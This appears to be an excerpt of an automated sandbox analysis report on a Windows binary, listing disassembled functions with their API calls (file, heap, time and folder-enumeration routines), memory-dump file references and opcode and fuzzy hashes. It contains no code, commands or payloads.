                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: d4d17273738f71febbbc7619e70d0dac950a8aa8cc54320b859b4c95196b8895
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: AB01D436509721EEF73426B55CC9A6B3694FB417B7734433EF926801F2EF928C86A144
                                    Function 00BE7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BF0DE8,00000000,?), ref: 00BE7B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE7B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00BF0DE8,00000000,?), ref: 00BE7B54
                                    • wsprintfA.USER32 ref: 00BE7B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 1580b3fd961a99e8008f8a458b91177d4dc05a6fa98634f7c6cb496196a127db
                                    • Instruction ID: bcae99476230c73d87f84a939ac3e2b084a4b0a7249666fbf89abf9ab2a4c930
                                    • Opcode Fuzzy Hash: 1580b3fd961a99e8008f8a458b91177d4dc05a6fa98634f7c6cb496196a127db
                                    • Instruction Fuzzy Hash: 1A115AB2908118ABCB14DBCADD44BBFB7F8EB4DB11F00414AF645A2290E3395940C7B0
                                    Function 00BE9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00BE3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00BE3D3E,?), ref: 00BE948C
                                    • GetFileSizeEx.KERNEL32(000000FF,00BE3D3E), ref: 00BE94A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 00BE94B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 337d7ca29771dbf7a3a1bfee080bc57041030bd8fd7441537182f5be5f009f9d
                                    • Instruction ID: 8f4742986c0b38aedb91a83396b0961fe31e880ed0e47d905681f7a4595593a6
                                    • Opcode Fuzzy Hash: 337d7ca29771dbf7a3a1bfee080bc57041030bd8fd7441537182f5be5f009f9d
                                    • Instruction Fuzzy Hash: 40F03135E04208BFDB20DBB2DC49F5E77F9AB58710F108594FA51A72C0D674A6058B80
                                    Function 00BECA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00BECA7E
                                      • Part of subcall function 00BEC2A0: __amsg_exit.LIBCMT ref: 00BEC2B0
                                    • __getptd.LIBCMT ref: 00BECA95
                                    • __amsg_exit.LIBCMT ref: 00BECAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00BECAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: de76f2b45dfd939fcee3fffca4641069e07e39e0cb45df82a6b466c1c4a79c8d
                                    • Instruction ID: d11d5a3fbb362ef787795977fe99f2071a3bc305028e436dda2c8fcbcea75f19
                                    • Opcode Fuzzy Hash: de76f2b45dfd939fcee3fffca4641069e07e39e0cb45df82a6b466c1c4a79c8d
                                    • Instruction Fuzzy Hash: B1F090329442989BD621FBAA9803B5F3FE0AF00724F1051D9F518AB1D6DF245D829A96
                                    Function 00C504D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 20ac198a38a017e9e97feec7c0c5861936864bc372292aa6c24f73cc28e90a18
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: B9417875900209AFCF16DF98DC81AEEBBB5FF48301F288099FD14A6211E3359A94DF58
                                    Function 00BE5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE51CA
                                    • lstrcat.KERNEL32(?,00BF1058), ref: 00BE51E7
                                    • lstrcat.KERNEL32(?,018B8FC0), ref: 00BE51FB
                                    • lstrcat.KERNEL32(?,00BF105C), ref: 00BE520D
                                      • Part of subcall function 00BE4B60: wsprintfA.USER32 ref: 00BE4B7C
                                      • Part of subcall function 00BE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                      • Part of subcall function 00BE4B60: StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                      • Part of subcall function 00BE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                      • Part of subcall function 00BE4B60: FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 441caf574b3e232b7e82d8bbaf120d94f30663302e9258f2b4f442c6b56ced0c
                                    • Instruction ID: 91f32f7fba7a0fd13ade9682b038bb7fb74ce601417523f66e3dddc3cc565e2e
                                    • Opcode Fuzzy Hash: 441caf574b3e232b7e82d8bbaf120d94f30663302e9258f2b4f442c6b56ced0c
                                    • Instruction Fuzzy Hash: 4021CDBAA00108AFC714FBB1EC42EED73BC9B59300F0045D4B655571A1EF74A6CC8B91